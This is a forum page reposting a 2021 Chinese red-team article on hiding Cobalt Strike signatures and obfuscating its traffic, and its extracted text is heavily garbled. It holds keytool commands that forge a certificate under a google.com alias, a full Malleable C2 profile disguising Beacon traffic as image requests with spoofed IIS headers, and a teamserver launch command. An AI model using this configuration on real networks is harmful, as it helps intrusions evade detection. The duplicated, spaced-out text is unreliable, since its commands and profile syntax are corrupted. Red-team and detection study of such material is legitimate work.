搜索

[21953] 2021-05-09_『红蓝对抗』CobaltStrike特征隐藏与流量混淆

文档创建者:s7ckTeam
浏览次数:28
最后更新:2025-01-18
2021-05-09_『红蓝对抗』CobaltStrike特征隐藏与流量混淆 C o b a l t   S t r i k e   L e m o n S e c   2 0 2 1 - 0 5 - 0 9 2 0 2 1 - 0 2 - 2 4 p b f o c h k         C S   0 x 0 0   线         0 x 0 1     1 . 1   k e y t o o l s           k e y c e r t i f i c a t e s     1 . 2     J D K     C o b a l t   S t r i k e M a l l e a b l e   C 2 C o b a l t   S t r i k e k e y t o o l s J a v a k e y t o o l s k e y s t o r e
  C S   1 2 使     3   使         4 k e y t o o l s k e y t o o l s k e y t o o l   - k e y s t o r e   c o b a l t s t r i k e . s t o r e   - s t o r e p a s s   1 2 3 4 5 6   - k e y p a s s   1 2 3 4 5 6   - g e n k e y   - k e y a l g   R S A   - a l i a s   g o o g l k e y t o o l   - k e y s t o r e   c o b a l t s t r i k e . s t o r e   - s t o r e p a s s   1 2 3 4 5 6   - k e y p a s s   1 2 3 4 5 6   - g e n k e y   - k e y a l g   R S A   - a l i a s   g o o g l e . c o m   - d n a m e   e . c o m   - d n a m e   " C N = ( a a ) ,   O U = ( b b ) ,   O = ( c c ) ,   L = ( d d ) ,   S T = ( e e ) ,   C = ( f f ) " " C N = ( a a ) ,   O U = ( b b ) ,   O = ( c c ) ,   L = ( d d ) ,   S T = ( e e ) ,   C = ( f f ) " k e y t o o l   - i m p o r t k e y s t o r e   - s r c k e y s t o r e   c o b a l t s t r i k e . s t o r e   - d e s t k e y s t o r e   c o b a l t s t r i k e . s t o r e   - d e s t s t o r e t y p e k e y t o o l   - i m p o r t k e y s t o r e   - s r c k e y s t o r e   c o b a l t s t r i k e . s t o r e   - d e s t k e y s t o r e   c o b a l t s t r i k e . s t o r e   - d e s t s t o r e t y p e   p k c s 1 2   p k c s 1 2 C o b a l t   S t r i k e c o b a l t s t r i k e . s t o r e t e a m s e r v e r k e y t o o l   - l i s t   - v   - k e y s t o r e   c o b a l t s t r i k e . s t o r e k e y t o o l   - l i s t   - v   - k e y s t o r e   c o b a l t s t r i k e . s t o r e
0 x 0 2   M a l l e a b l e   C 2       ,     " "     C 2   M a l l e a b l e   C 2 [ 1 ]     B e a c o n     C 2   2 . 1       1 2   G e t   M a l l e a b l e   C 2 C o b a l t   S t r i k e . p r o f i l e s e t s e t   s a m p l e _ n a m e     s a m p l e _ n a m e   " i m g t e s t " " i m g t e s t " ; ;     s e t s e t   s l e e p t i m e     s l e e p t i m e   " 5 0 0 0 " " 5 0 0 0 " ; ;     #   #   s e t s e t   j i t t e r           j i t t e r         " 0 " " 0 " ; ;             #   0 - 9 9 % #   0 - 9 9 % s e t s e t   m a x d n s           m a x d n s         " 2 5 5 " " 2 5 5 " ; ;     #   D N S 0 - 2 5 5 #   D N S 0 - 2 5 5 s e t s e t   u s e r a g e n t     u s e r a g e n t   " M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   8 . 0 ;   W i n d o w s   N T   6 . 1 ;   T r i d e n t / 5 . 0 ) " " M o z i l l a / 5 . 0   ( c o m p a t i b l e ;   M S I E   8 . 0 ;   W i n d o w s   N T   6 . 1 ;   T r i d e n t / 5 . 0 ) " ; ;             #   h t t p 使 #   h t t p 使
3   P o s t   2 . 2   1   h t t p - g e t   h t t p - g e t   { {                 s e t s e t   u r i     u r i   " / i m a g e / " " / i m a g e / " ; ;         c l i e n t           c l i e n t   { {                 h e a d e r                   h e a d e r   " A c c e p t " " A c c e p t "     " t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , * / * l ; q = 0 . 8 " " t e x t / h t m l , a p p l i c a t i o n / x h t m l + x m l , a p p l i c a t i o n / x m l ; q = 0 . 9 , * / * l ; q = 0 . 8 " ; ;                 h e a d e r                   h e a d e r   " R e f e r e r " " R e f e r e r "     " h t t p : / / w w w . g o o g l e . c o m " " h t t p : / / w w w . g o o g l e . c o m " ; ;                         h e a d e r                   h e a d e r   " P r a g m a " " P r a g m a "     " n o - c a c h e " " n o - c a c h e " ; ;                 h e a d e r                   h e a d e r   " C a c h e - C o n t r o l " " C a c h e - C o n t r o l "     " n o - c a c h e " " n o - c a c h e " ; ;                 m e t a d a t a                   m e t a d a t a   { {                         n e t b i o s                         n e t b i o s ; ;                         a p p e n d                           a p p e n d   " . j p g " " . j p g " ; ;         #   #                           u r i - a p p e n d                         u r i - a p p e n d ; ;                                 } }                 } }         s e r v e r           s e r v e r   { {                 h e a d e r                   h e a d e r   " C o n t e n t - T y p e " " C o n t e n t - T y p e "     " i m g / j p g " " i m g / j p g " ; ;                 h e a d e r                   h e a d e r   " S e r v e r " " S e r v e r "     " M i c r o s o f t - I I S / 6 . 0 " " M i c r o s o f t - I I S / 6 . 0 " ; ;                 h e a d e r                   h e a d e r   " X - P o w e r e d - B y " " X - P o w e r e d - B y "     " A S P . N E T " " A S P . N E T " ; ;                 o u t p u t                   o u t p u t   { {                         b a s e 6 4                         b a s e 6 4 ; ;         #   b a s e 6 4 b a s e 6 4 u r l n e t b i o s n e t b i o s u #   b a s e 6 4 b a s e 6 4 u r l n e t b i o s n e t b i o s u                         p r i n t                         p r i n t ; ;                                 } }                 } } } } h t t p - p o s t   h t t p - p o s t   { {                 s e t s e t   u r i     u r i   " / e m a i l / " " / e m a i l / " ; ;         c l i e n t           c l i e n t   { {                 h e a d e r                   h e a d e r   " C o n t e n t - T y p e " " C o n t e n t - T y p e "     " a p p l i c a t i o n / o c t e t - s t r e a m " " a p p l i c a t i o n / o c t e t - s t r e a m " ; ;                 h e a d e r                   h e a d e r   " R e f e r e r " " R e f e r e r "     " h t t p : / / w w w . g o o g l e . c o m " " h t t p : / / w w w . g o o g l e . c o m " ; ;                     h e a d e r                   h e a d e r   " P r a g m a " " P r a g m a "     " n o - c a c h e " " n o - c a c h e " ; ;                 h e a d e r                   h e a d e r   " C a c h e - C o n t r o l " " C a c h e - C o n t r o l "     " n o - c a c h e " " n o - c a c h e " ; ;                                 i d i d     { {                         n e t b i o s u                         n e t b i o s u ; ;                         a p p e n d                           a p p e n d   " . p n g " " . p n g " ; ;                         u r i - a p p e n d                         u r i - a p p e n d ; ;                                 } }                 o u t p u t                   o u t p u t   { {                         b a s e 6 4                         b a s e 6 4 ; ;                         p r i n t                         p r i n t ; ;                                 } }                 } }         s e r v e r           s e r v e r   { {                 h e a d e r                   h e a d e r   " C o n t e n t - T y p e " " C o n t e n t - T y p e "     " i m g / j p g " " i m g / j p g " ; ;                 h e a d e r                   h e a d e r   " S e r v e r " " S e r v e r "     " M i c r o s o f t - I I S / 6 . 0 " " M i c r o s o f t - I I S / 6 . 0 " ; ;                 h e a d e r                   h e a d e r   " X - P o w e r e d - B y " " X - P o w e r e d - B y "     " A S P . N E T " " A S P . N E T " ; ;                 o u t p u t                   o u t p u t   { {                         b a s e 6 4                         b a s e 6 4 ; ;                         p r i n t                         p r i n t ; ;                                 } }                 } } } } . p r i f i l e
      2 线   3   G E T   c 2 l i n t . / t e a m s e r v e r   1 0 . 1 0 . 1 0 . 1 0   1 2 3 4 5 6   c 2 - p r o f i l e / i m g t e s t . p r o f i l e
4   P O S T   0 x 0 3         使 0 x 0 4     C S R e f e r e n c e s C o b a l t   S t r i k e t e a m s e r v e r
  M a l l e a b l e   C 2 :   h t t p s : / / g i t h u b . c o m / r s m u d g e / M a l l e a b l e - C 2 - P r o f i l e s L e m o n S e c
回复

举报

高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Archiver| 手机版| 小黑屋|
Powered by Discuz! X3.4 Copyright © 2001-2020, Tencent Cloud. 商业源码建议获取授权,如侵犯您的权益,请联系客服处理